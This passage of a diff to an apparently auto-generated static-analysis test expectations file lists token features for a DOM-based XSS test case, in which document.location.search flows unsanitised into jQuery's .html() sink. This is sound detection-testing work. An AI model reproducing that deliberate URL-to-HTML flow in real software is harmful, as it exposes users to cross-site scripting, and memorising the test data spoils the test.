document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:35 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:42 | documen ... .search | assignedToPropName | taint3 | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:42 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:42 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:42 | documen ... .search | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:42 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:391:19:391:42 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:391:28:391:35 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:391:28:391:35 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:391:28:391:35 | location | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:391:28:391:35 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:391:28:391:35 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:391:37:391:42 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:391:37:391:42 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:391:37:391:42 | search | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:391:37:391:42 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:391:37:391:42 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:3 | $ | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | $('myId ... taint3) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | $('myId ... taint3) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | $('myId ... taint3) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | $('myId ... taint3) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | $('myId ... taint3) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | exceptional return of $('myId ... taint3) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | exceptional return of $('myId ... taint3) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | exceptional return of $('myId ... taint3) | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | exceptional return of $('myId ... taint3) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:392:3:392:31 | exceptional return of $('myId ... taint3) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:392:5:392:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:392:5:392:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:392:5:392:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17429,6 +121225,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:392:5:392:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:392:5:392:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:392:5:392:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:392:13:392:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:392:13:392:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:392:13:392:16 | html | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:392:13:392:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:392:13:392:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:392:18:392:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:392:18:392:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:392:18:392:23 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:392:18:392:23 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:392:18:392:23 | target | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:392:18:392:30 | target.taint3 | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:392:18:392:30 | target.taint3 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:392:18:392:30 | target.taint3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17436,6 +121242,77 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:392:18:392:30 | target.taint3 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | | autogenerated/Xss/DomBasedXss/tst.js:392:18:392:30 | target.taint3 | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:392:18:392:30 | target.taint3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:392:25:392:30 | taint3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:392:25:392:30 | taint3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:392:25:392:30 | taint3 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:392:25:392:30 | taint3 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:392:25:392:30 | taint3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:8 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:8 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:8 | target | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:8 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:8 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:12 | target.sub | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:12 | target.sub | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:12 | target.sub | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:12 | target.sub | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:12 | target.sub | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:19 | target.sub.taint4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:19 | target.sub.taint4 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:19 | target.sub.taint4 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:19 | target.sub.taint4 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:19 | target.sub.taint4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:23 | target. ... nt4 = 2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:23 | target. ... nt4 = 2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:23 | target. ... nt4 = 2 | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search $ myId html target taint3 target sub taint4 2 $ myId html target sub taint4 $ myId html target taint5 target taint5 safe target taint6 2 random $ myId html target taint6 random target taint7 safe $ myId html target taint7 target taint8 target taint8 $ myId html target taint8 target taint9 target taint9 safe $ myId html target taint9 | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:23 | target. ... nt4 = 2 | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:394:3:394:23 | target. ... nt4 = 2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:394:10:394:12 | sub | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:394:10:394:12 | sub | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:394:10:394:12 | sub | enclosingFunctionBody | target document location search $ myId html target $ myId html target taint target taint2 2 $ myId html target taint2 target taint3 document location search 